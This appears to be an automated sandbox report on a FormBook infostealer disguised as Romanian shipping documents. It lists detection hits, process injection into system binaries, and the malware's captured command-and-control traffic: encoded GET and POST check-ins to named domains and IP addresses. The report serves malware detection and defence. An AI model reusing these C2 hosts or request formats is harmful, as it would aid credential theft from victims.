Windows Analysis Report
AWB_5771388044 Documente de expediere.exe

AI detected suspicious sample

Source: Yara match	File source: 1.2.svchost.exe.4e0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.svchost.exe.4e0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.2914944914.00000000008A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2916379942.0000000002F90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2248534012.0000000002F90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2248246717.00000000004E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2915999242.0000000001630000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2916441443.0000000002FE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2248900268.0000000003D50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2916213463.0000000003560000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: AWB_5771388044 Documente de expediere.exe

Joe Sandbox ML: detected

Source: AWB_5771388044 Documente de expediere.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: dnqNlDRmfuUrS.exe, 00000005.00000000.2173780390.000000000069E000.00000002.00000001.01000000.00000005.sdmp, dnqNlDRmfuUrS.exe, 00000007.00000002.2914995119.000000000069E000.00000002.00000001.01000000.00000005.sdmp
Source:	Binary string: wntdll.pdbUGP source: AWB_5771388044 Documente de expediere.exe, 00000000.00000003.1664353093.00000000041C0000.00000004.00001000.00020000.00000000.sdmp, AWB_5771388044 Documente de expediere.exe, 00000000.00000003.1665181590.0000000004020000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2248567406.000000000319E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2248567406.0000000003000000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2155473181.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2156904567.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, sc.exe, 00000006.00000002.2916643666.00000000033AE000.00000040.00001000.00020000.00000000.sdmp, sc.exe, 00000006.00000002.2916643666.0000000003210000.00000040.00001000.00020000.00000000.sdmp, sc.exe, 00000006.00000003.2250045957.0000000003067000.00000004.00000020.00020000.00000000.sdmp, sc.exe, 00000006.00000003.2248479905.0000000002E95000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: sc.pdbUGP source: svchost.exe, 00000001.00000003.2216853278.0000000002A1A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2216942488.0000000002A3B000.00000004.00000020.00020000.00000000.sdmp, dnqNlDRmfuUrS.exe, 00000005.00000003.2213928575.000000000103B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: AWB_5771388044 Documente de expediere.exe, 00000000.00000003.1664353093.00000000041C0000.00000004.00001000.00020000.00000000.sdmp, AWB_5771388044 Documente de expediere.exe, 00000000.00000003.1665181590.0000000004020000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000002.2248567406.000000000319E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2248567406.0000000003000000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2155473181.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2156904567.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, sc.exe, sc.exe, 00000006.00000002.2916643666.00000000033AE000.00000040.00001000.00020000.00000000.sdmp, sc.exe, 00000006.00000002.2916643666.0000000003210000.00000040.00001000.00020000.00000000.sdmp, sc.exe, 00000006.00000003.2250045957.0000000003067000.00000004.00000020.00020000.00000000.sdmp, sc.exe, 00000006.00000003.2248479905.0000000002E95000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: sc.pdb source: svchost.exe, 00000001.00000003.2216853278.0000000002A1A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2216942488.0000000002A3B000.00000004.00000020.00020000.00000000.sdmp, dnqNlDRmfuUrS.exe, 00000005.00000003.2213928575.000000000103B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: svchost.pdb source: sc.exe, 00000006.00000002.2915308329.0000000002D1F000.00000004.00000020.00020000.00000000.sdmp, sc.exe, 00000006.00000002.2917111114.000000000383C000.00000004.10000000.00040000.00000000.sdmp, dnqNlDRmfuUrS.exe, 00000007.00000002.2916712819.000000000341C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2540186843.000000000543C000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: svchost.pdbUGP source: sc.exe, 00000006.00000002.2915308329.0000000002D1F000.00000004.00000020.00020000.00000000.sdmp, sc.exe, 00000006.00000002.2917111114.000000000383C000.00000004.10000000.00040000.00000000.sdmp, dnqNlDRmfuUrS.exe, 00000007.00000002.2916712819.000000000341C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2540186843.000000000543C000.00000004.80000000.00040000.00000000.sdmp

Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe	Code function: 0_2_00D46CA9 GetFileAttributesW,FindFirstFileW,FindClose,	0_2_00D46CA9
Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe	Code function: 0_2_00D460DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,	0_2_00D460DD
Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe	Code function: 0_2_00D463F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,	0_2_00D463F9
Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe	Code function: 0_2_00D4EB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_00D4EB60
Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe	Code function: 0_2_00D4F5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	0_2_00D4F5FA
Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe	Code function: 0_2_00D4F56F FindFirstFileW,FindClose,	0_2_00D4F56F
Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe	Code function: 0_2_00D51B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00D51B2F
Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe	Code function: 0_2_00D51C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00D51C8A
Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe	Code function: 0_2_00D51F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_00D51F94
Source: C:\Windows\SysWOW64\sc.exe	Code function: 6_2_008BCA10 FindFirstFileW,FindNextFileW,FindClose,	6_2_008BCA10

Source: C:\Windows\SysWOW64\sc.exe	Code function: 4x nop then xor eax, eax	6_2_008A9F90
Source: C:\Windows\SysWOW64\sc.exe	Code function: 4x nop then pop edi	6_2_008AE5AA
Source: C:\Windows\SysWOW64\sc.exe	Code function: 4x nop then mov ebx, 00000004h	6_2_031004EE

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49763 -> 108.179.253.197:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49763 -> 108.179.253.197:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49804 -> 108.181.189.7:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49819 -> 108.181.189.7:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49827 -> 108.181.189.7:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49827 -> 108.181.189.7:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49810 -> 108.181.189.7:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49843 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49849 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49861 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49855 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49861 -> 13.248.169.48:80

Performs DNS queries to domains with low reputation

Source:

DNS query: www.avalanchefi.xyz

Source: Joe Sandbox View	IP Address: 13.248.169.48 13.248.169.48
Source: Joe Sandbox View	IP Address: 108.181.189.7 108.181.189.7

Source: Joe Sandbox View	ASN Name: AMAZON-02US AMAZON-02US
Source: Joe Sandbox View	ASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
Source: Joe Sandbox View	ASN Name: ASN852CA ASN852CA

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe

Code function: 0_2_00D54EB5 InternetReadFile,InternetQueryDataAvailable,InternetReadFile,

0_2_00D54EB5

Source: global traffic	HTTP traffic detected: GET /7n6c/?FH1D=O4FXjFCpJjRpaxv&gdIlTvE8=ePeKNPyUeLpNn1ut9QR5+vkaHUGSQvJrwPLb6fKcgQCso5jGZqjP6M9GYYTFao+4npn6icqsLwsi7nEjf66UvTUwrIE2dD1LfojjSGoioIp2xNG+LZcOM+Y= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.bloodbalancecaps.shopConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; nl-nl; GT-P5210 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
Source: global traffic	HTTP traffic detected: GET /xu9o/?gdIlTvE8=Y1SnkQLh9oyCIrW0o0O4vqPemXX8Spt1zoY93P6OWbCvdS06v54NadN0bxhIZaxlyI96f1lIInN9xaPSBVcrMr8DLl9ZyJ18b2nxQ81rZE0uLnMg7aaVIRg=&FH1D=O4FXjFCpJjRpaxv HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.jalan2.onlineConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; nl-nl; GT-P5210 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
Source: global traffic	HTTP traffic detected: GET /ctta/?FH1D=O4FXjFCpJjRpaxv&gdIlTvE8=73htI/07lnbi6jhjvkNHrlWSa6BSjsKivRRSV4arkt57XDlKC2xJvna+Jje1nWd5k0Z3PS0VVZTw4ek7NFPoag2/xWEWhdCP8yoM02bo7Rk5ZALP8w8OFi4= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.avalanchefi.xyzConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; nl-nl; GT-P5210 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30

Source: global traffic	DNS traffic detected: DNS query: www.bloodbalancecaps.shop
Source: global traffic	DNS traffic detected: DNS query: www.jalan2.online
Source: global traffic	DNS traffic detected: DNS query: www.avalanchefi.xyz
Source: global traffic	DNS traffic detected: DNS query: www.02760.wang

Source: unknown

HTTP traffic detected: POST /xu9o/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Host: www.jalan2.onlineOrigin: http://www.jalan2.onlineReferer: http://www.jalan2.online/xu9o/Content-Type: application/x-www-form-urlencodedConnection: closeContent-Length: 205Cache-Control: max-age=0User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; nl-nl; GT-P5210 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30Data Raw: 67 64 49 6c 54 76 45 38 3d 56 33 36 48 6e 6d 69 69 37 39 65 36 5a 61 44 49 36 54 53 62 6c 71 66 57 73 56 72 4b 54 35 74 77 69 59 35 5a 30 39 7a 72 57 36 2b 51 66 54 78 4e 72 72 51 75 58 39 56 63 64 45 51 33 4c 4a 77 6e 38 36 78 35 55 56 74 4c 63 55 45 42 68 61 4c 6a 47 6e 77 6c 4d 72 30 69 4c 55 74 43 75 4a 4a 66 56 6c 57 33 4e 74 46 67 58 31 64 74 56 47 6f 30 2b 71 61 48 56 42 4b 6b 6a 38 52 6f 63 52 31 69 53 52 55 62 68 4b 69 4f 70 39 35 56 46 70 38 7a 69 49 6b 72 6d 49 7a 34 36 52 52 30 53 6f 48 6b 56 4c 52 52 4b 56 41 71 30 48 58 4e 74 34 4a 72 70 75 39 61 73 63 74 75 50 4e 48 68 7a 77 2f 67 55 67 3d 3d Data Ascii: gdIlTvE8=V36Hnmii79e6ZaDI6TSblqfWsVrKT5twiY5Z09zrW6+QfTxNrrQuX9VcdEQ3LJwn86x5UVtLcUEBhaLjGnwlMr0iLUtCuJJfVlW3NtFgX1dtVGo0+qaHVBKkj8RocR1iSRUbhKiOp95VFp8ziIkrmIz46RR0SoHkVLRRKVAq0HXNt4Jrpu9asctuPNHhzw/gUg==

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not Foundcontent-type: text/htmlcache-control: private, no-cache, max-age=0pragma: no-cachedate: Mon, 09 Dec 2024 12:14:24 GMTserver: LiteSpeedcontent-encoding: gzipvary: Accept-Encodingtransfer-encoding: chunkedconnection: closeData Raw: 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 0d 0a Data Ascii: a
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not Foundcontent-type: text/htmlcache-control: private, no-cache, max-age=0pragma: no-cachedate: Mon, 09 Dec 2024 12:14:27 GMTserver: LiteSpeedcontent-encoding: gzipvary: Accept-Encodingtransfer-encoding: chunkedconnection: closeData Raw: 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 0d 0a Data Ascii: a
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not Foundcontent-type: text/htmlcache-control: private, no-cache, max-age=0pragma: no-cachedate: Mon, 09 Dec 2024 12:14:29 GMTserver: LiteSpeedcontent-encoding: gzipvary: Accept-Encodingtransfer-encoding: chunkedconnection: closeData Raw: 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 0d 0a 32 62 64 0d 0a 65 54 6b 6b db 30 14 fd 5e d8 7f b8 4d 19 b4 10 27 76 ea b0 61 3b 66 63 0f 36 18 5b a1 85 b1 8f b2 75 1d 89 ca 92 27 29 af 95 fe f7 5d d9 49 9a b6 16 d8 92 7c 75 74 ee 39 57 2a ce 3f ff fa 74 f7 e7 e6 0b 08 df aa f2 ac 08 1f 70 7e a7 70 31 12 28 97 c2 67 49 1c bf 1d 85 5f c8 38 7d 5a f4 0c 34 6b 29 60 2d 71 d3 19 eb 47 50 1b ed 51 fb c5 68 23 b9 17 0b 8e 6b 59 63 d4 0f c6 20 b5 f4 92 a9 c8 d5 8c 60 93 31 38 61 a5 be 8f bc 89 1a e9 17 da 04 74 2f bd c2 12 d2 38 85 9f c6 c3 57 b3 d2 fc cd 59 31 1d e6 8b 9e 52 f9 a1 45 2e 19 5c 76 16 1b b4 2e aa 8d 32 96 70 05 b6 98 71 66 ef af 1e 2a c3 77 0f 15 ab ef 97 36 40 0c 21 d9 45 1c c7 e7 b2 0d 64 99 f6 8f 8f c5 74 00 2c a6 fb ac c2 b2 43 de c3 12 b8 48 d3 34 87 96 d9 a5 d4 59 9c 37 94 62 06 da d8 96 29 48 d2 6e 3b 9d c5 dd 16 3e 5a 4a 6d 0c df 50 ad d1 cb 9a 51 76 4c bb c8 a1 95 4d 0e 27 12 e6 f0 8a 15 5c 34 4d 93 87 ec b9 5c bf 50 9d ad bc a1 dd a5 8e 9e 61 8c 4a 08 cf e9 02 8f 5b 1f 31 25 97 3a 83 9a 4c 40 9b 43 af 7c f6 3e 26 86 87 14 22 85 0d 25 10 a5 c3 64 67 1c b9 62 74 c6 2a 67 d4 ca 63 0e de 74 19 5c 87 5d fa d0 39 f5 88 1b ec 9f 42 24 87 1d 8f 9a 40 10 25 72 f2 1f 66 c9 bc 87 55 52 e3 91 f1 30 d5 c7 6c 86 a9 ca 28 4e a0 e4 32 29 9f 84 a2 9a 3d 07 8d 02 89 20 6c fe 04 4d 9c 68 3c 2a 9f d5 85 98 d1 ea ae bc 13 08 16 9d 59 d9 3a 74 fe ae d0 79 e4 54 8f 2b c5 c9 2c 0f 15 12 01 5a 03 46 83 17 d2 01 39 b3 46 7b 5e 4c 3b 02 98 92 8e e5 fe 7d 22 e9 be 68 9a 38 b4 67 59 ce 88 c9 3e fd de a1 8e 71 2e f5 32 0b a5 10 68 c2 a1 93 1f 05 b6 a8 98 97 6b cc 6b 85 cc 92 04 5e e4 4f 9e 1e f1 fa cc a3 24 4e 68 e6 75 fd a6 ef 42 cb 2b 63 39 da 3e 14 28 10 c8 3a c9 c1 2e 2b 76 19 8f fb 36 49 e6 57 14 b6 8d 9c 60 dc 6c 32 88 fb c0 78 08 9a cd e7 63 78 7a c5 93 eb 2b 3a 9e 0e 7d 5f 85 95 2d 6f 68 57 ae 76 54 1e 1b b4 24 64 b5 83 1f d2 e3 6d 87 34 f8 8d 15 dc f6 f2 91 f2 37 94 8d c3 a0 2f e3 6b e9 e8 b7 17 cc 9f 44 df 61 2d 34 b1 5f 4a 74 f0 5d d7 13 20 f5 83 25 0c 36 04 24 8c f3 a4 1c 59 d5 76 4c ef 80 69 3e 06 46 fe ac 6a ba 33 04 0b b1 fd bd 62 8d 02 43 7b 1e 2e 99 97 7e d2 86 93 e0 e6 c1 cc 70 94 c3 c1 ee 2f b4 ff 0d 2b 0f 61 e1 04 00 00 0d 0a Data Ascii: a2bdeTkk0^M'va;fc6[u')]I\|ut9W?tp~p1(gI_8}Z4k)`-qGPQh#kYc `18at/8WY1RE.\v.2pqfw6@!Edt,CH4Y7b)Hn;>ZJmPQvLM'\4M\PaJ[1%:L@C\|>&"%dgbtgct\]9B$@%rfUR0l(N2)= lMh<Y:tyT+,ZF9F{^L;}"h8gY>q.2hkk^O$Nhu
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not Foundcontent-type: text/htmlcache-control: private, no-cache, max-age=0pragma: no-cachecontent-length: 1249date: Mon, 09 Dec 2024 12:14:32 GMTserver: LiteSpeedconnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75

Source: sc.exe, 00000006.00000002.2917111114.0000000003C24000.00000004.10000000.00040000.00000000.sdmp, dnqNlDRmfuUrS.exe, 00000007.00000002.2916712819.0000000003804000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2540186843.0000000005824000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: http://bloodbalancecaps.shop/7n6c/?FH1D=O4FXjFCpJjRpaxv&gdIlTvE8=ePeKNPyUeLpNn1ut9QR5
Source: dnqNlDRmfuUrS.exe, 00000007.00000002.2915999242.000000000168F000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.avalanchefi.xyz
Source: dnqNlDRmfuUrS.exe, 00000007.00000002.2915999242.000000000168F000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.avalanchefi.xyz/ctta/
Source: sc.exe, 00000006.00000003.2435734617.0000000007C4D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: sc.exe, 00000006.00000003.2435734617.0000000007C4D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: sc.exe, 00000006.00000003.2435734617.0000000007C4D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: sc.exe, 00000006.00000003.2435734617.0000000007C4D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: sc.exe, 00000006.00000003.2435734617.0000000007C4D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: sc.exe, 00000006.00000003.2435734617.0000000007C4D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: sc.exe, 00000006.00000003.2435734617.0000000007C4D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: sc.exe, 00000006.00000002.2915308329.0000000002D3C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: sc.exe, 00000006.00000002.2915308329.0000000002D3C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: sc.exe, 00000006.00000002.2915308329.0000000002D3C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: sc.exe, 00000006.00000002.2915308329.0000000002D3C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
Source: sc.exe, 00000006.00000002.2915308329.0000000002D3C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: sc.exe, 00000006.00000003.2428953474.0000000007C2B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
Source: sc.exe, 00000006.00000003.2435734617.0000000007C4D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: sc.exe, 00000006.00000003.2435734617.0000000007C4D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe

Code function: 0_2_00D56B0C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

